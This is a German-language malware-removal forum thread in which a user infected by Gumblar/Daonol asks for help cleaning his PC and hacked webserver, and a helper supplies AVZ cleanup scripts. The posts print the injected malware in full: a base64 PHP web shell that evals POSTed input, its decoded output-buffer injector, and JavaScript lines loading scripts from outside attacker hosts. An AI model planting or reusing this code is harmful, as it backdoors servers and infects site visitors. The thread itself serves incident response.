moin,

bin gerade auf euer board gestoßen..

habe mir etwas eingefangen, und bekomm´s net weg

mein sys:
-winxp, sygate, antivir

ich beschreib mal kurz:
-firewall lässt sich nicht starten
-wmp classic funzt auch nicht
-bei jeder 5ten oder 10ten googlesuche schmeißt er mich auf falsche seiten (zumbeispiel auf diese "http://popencoc.com/in.cgi?4&parameter=icq&ur=1&HTTP_REFERER=31201" wenn ich nach ICQ suche)
-icq und andere programme stürzen öfter ab

bisher erfolglos:
-autoruns.exe zeigt mir nix komisches an
-registry auch manuel durchsucht aber keine passenden einträge gefunden
-alle plugins vom browser überprüft
-autostart dateien und ordner(system.ini, etc) überprüft

erfolgreich:
-mit ad-aware habe ich gefährliche Cookies und einen Trojaner gelöscht, der Übeltäter nannte sich "TR/Daonol.AA"

derzeitiger Status:
-ik dachte der wäre weg, aber wenn ich mein browser starte, verhindert ad-aware das meine registry verändert wird, und danach springt antivir an und meldet mir eine Datei im c:\Programme -Ordner.. die danach sofort wieder verschwindet..
-ich nehme mal an, das der wurm sich in meiner registry drin stehen hat, das bei jedem browserstart der wurm sich wieder neu saugt... evtl tarnt er sich auch als ein signiertes plugin, was ich so nicht erkenne...

meine frage.. kennt einer den wurm, was macht er und wo schreibt er sich überall fest

thnx im voraus

Zitat:

Malwarebytes' Anti-Malware 1.41
Datenbank Version: 3213
Windows 5.1.2600 Service Pack 2

22.11.2009 17:20:37
mbam-log-2009-11-22 (17-20-37).txt

Scan-Methode: Vollständiger Scan (C:\|)
Durchsuchte Objekte: 232796
Laufzeit: 27 minute(s), 24 second(s)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

wie gesagt, keiner findet was, allerdings taucht das teil immer wieder auf...

das ding nimmt anscheinend größere ausmaße... mein ganzer webserver is befallen

in jeder html und php-file sind neue code-zeilen

Code: Alles auswählenAufklappen

ATTFilter

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'
         

darüber hab ich mir das teil warscheinlich eingefangen...

Zitat:

190.54.62.68 - - [22/Nov/2009:12:15:26 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:28 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:29 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:30 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:32 +0100] "POST /images/gifimg.php HTTP/1.0" 200 320 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:33 +0100] "POST /images/kyg/logo.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:34 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:35 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:36 +0100] "POST /images/gifimg.php HTTP/1.0" 200 328 "-" "-"
190.54.62.68 - - [22/Nov/2009:12:15:38 +0100] "POST /images/kyg/banner_small.php HTTP/1.0" 200 296 "-" "-"

der sack hat sich anscheinend reingehackt und sein wurm verbreitet
oder läuft bei meinem provider der wurm auf den servern?

evtl bin ik ja jetz schon sauber, und hol mir das immer wieder durch mein webserver rein...

hallo, kennt einer den wurm?

was schreibt der in die registry?

wurde der wurm vom hacker auf meinem webserver platziert?

keiner n plan, oder will mir keiner helfen?

gebt ma feedback, dann lösch ik mich hier wieder

Hallöle.

Das du gereizt bist kann man verstehen. Wir machen uns die Arbeit hier aber ehrenamtlich und haben daher wenig Lust auf dumme Anmachen.
Zügel deine schlechte Laune daher bitte ein wenig.

Den Webserver solltest du natürlich vom Netz nehmen und neuaufsetzen.

Poste bitte zwei AVZ logs wie in der Anleitung beschrieben.

war ja kene anmache und bin ja och nich gereizt, wollt nur ne info, warum allen nur mir nich geantwortet wird ejal/wayne

mein webserver ist leider nur n gemieteter, bzw ich hab da nur n paar ordner... den betreiber hab ik schon informiert, aber auch noch keine rückmeldung erhalten..
neuaufsetzen is nich jut, da meine backups nich aktuell sind, mir bleibt wohl nix anderes übrig und alle dateien/scripte runterzuladen und mitn andern script nach den eintragungen suchen und rausnehmen lassen...

dad mit AVZ werd ik glei ma machen

hier sind die logs, ik hab schonma als dank zweima auf die googlewerbung geklickt

Führe bitte folgendes Skript aus:

Code: Alles auswählenAufklappen

ATTFilter

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 DeleteFile('C:\PROGRA~1\INTERN~1\..\lohe.old 0yAAAAAAAA');
 DelBHO('AutorunsDisabled');
 DelBHO('710EB7A1-45ED-11D0-924A-0020AFC7AC4D');
 QuarantineFile('C:\WINDOWS\system32\x264vfw.dll');
 QuarantineFile('C:\WINDOWS\Installer\{90170407-6000-11D3-8CFE-0150048383C9}\misc.exe');
 QuarantineFile('spse.sys');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows NT\CurrentVersion\Drivers32','midi9');
BC_ImportALL;
ExecuteSysClean;
ExecuteWizard('TSW', 3, 3, true); 
BC_Activate;
RebootWindows(true);
end.
         

Nach dem Neustarte führ bitte folgendes Skript aus:

Code: Alles auswählenAufklappen

ATTFilter

begin
CreateQurantineArchive('C:\quarantine.zip');
end.
         

Die C:\quarantine.zip lade bitte bei file-upload.net hoch und poste uns den downloadlink.

"windows Scripting Host" ist bei mir deaktiviert/deinstalliert, gibts eine andere möglichkeit?

vom webspace-anbieter hab ich die info bekommen, das nur ich betroffen bin. ich soll/werde n backup ziehen, bereinigen und neu aufspielen.. is nur übel bei ca 15 subdomains und lauter unterwebs(blogs,foren,etc)... es sind wirklich alle html,php und js-files betroffen..

das komische, es hat sich bisher keiner weiter eingelogt, und es sind bereits gesäuberte dateien wieder verseucht...

Zitat:

aus meinem Forum:


habe in php-seiten das stehen:

<? php eval base64_decode(xxxxx)

und in html-seiten steht immer n script von irgendwelchen webseiten....

und in jeden image-ordner eine:

gifimg.php

in der steht zbsp auch

Code: Alles auswählenAufklappen

ATTFilter

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
         

is ne 64bit-verschl., übersetzt(encoded) kommt das raus

Code: Alles auswählenAufklappen

ATTFilter

if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
         

die config hat das drin:

Code: Alles auswählenAufklappen

ATTFilter

aWYoIWZ1bmN0aW9uX2V4aXN0cygnaHdjbjInKSl7ZnVuY3Rpb24gaHdjbjIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMnR1Wldsd2NDMWxiV1JsYmk1a1pTOXRiMjVoZEM5cmFYUmhMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gaHdjbjIyKCRhLCRiLCRjLCRkKXtnbG9iYWwkaHdjbjIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRod2NuMjEpKWNhbGxfdXNlcl9mdW5jKCRod2NuMjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2h3Y24yJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnaHdjbjInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kaHdjbjJsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdod2NuMjInKSkhPSdod2NuMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw
         

und übersetzt:

Code: Alles auswählenAufklappen

ATTFilter

if(!function_exists('hwcn2')){function hwcn2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2tuZWlwcC1lbWRlbi5kZS9tb25hdC9raXRhLnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function hwcn22($a,$b,$c,$d){global$hwcn21;$s=array();if(function_exists($hwcn21))call_user_func($hwcn21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='hwcn2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('hwcn2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$hwcn2l=(($a=@set_error_handler('hwcn22'))!='hwcn22')?$a:0;eval(base64_decode($_POST['e']));
         

außerdem steht in jeder js-file:

Code: Alles auswählenAufklappen

ATTFilter

document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://premiumoriginalprints.com/libraries/CREDITS.php ><\/script>');
document.write('<script src=http://m1design.ho.ua/images/gifimg.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
document.write('<script src=http://kneipp-emden.de/monat/kita.php ><\/script>');
         

dazu hab ich das gefunden
http://www.samuidevelopment.com/2009...itet-sich-aus/

hier nochma die google-meldung, scheinen mehr seiten zu betreffen
http://www.google.com/safebrowsing/d...reme.de/&hl=de

Du sollst das Skript mit AVZ ausführen. Oder geht das ohne den Skript Host nicht. Wenn nicht dann musst du ihn wieder aktivieren. Warum ist der deaktiviert??

deaktiviert, damit keine scripte nebenbei bei mir ausgeführt werden können, da ich dies nicht benötige und einige störenfriede so nicht aktiv werden können.. ach mit avz, jo das mach ich gleich mal ^^

die 111111.com lässt sich nicht mehr starten, beim öffnen passiert nix, nichtmal ein task wird angezeigt, ich mach feierabend für heute.. bis morgen

€dit:achso,ich kanns mir auch nicht neu saugen ->http501/505

Und, heute besser mit AVZ?

es lässt sich nicht mehr starten... ich versuchs nochma neu zu saugen...

das teil was ich mir und meinem server eingefangen hab nennt sich wohl "Gumblar"


€dit: bekomme immer 501/505 error, kanns net mehr saugen und nicht starten...

AVZ lässt sich nicht mehr starten oder downloaden, und "Malwarebytes' Anti-Malware" schließt sich nach 1sek automatisch... ad-aware und antivir laufen aber ohne probleme....

ich hab mein server bereinigt, wenn ich den hier noch drauf hab, war das alles um sonst, wa?

sry für die doppelposts, aber ich kann nicht mehr den beitrag editieren...

ich wollte gerade mcafee saugen, komme aber nichtmal auf die homepage...

ich habe mal ne txt-datei von "autoruns" mit angehangen, evtl findet ihr ja was, was ich im abgesicherten rauskannten kann..

ich will mein sys nicht neu machen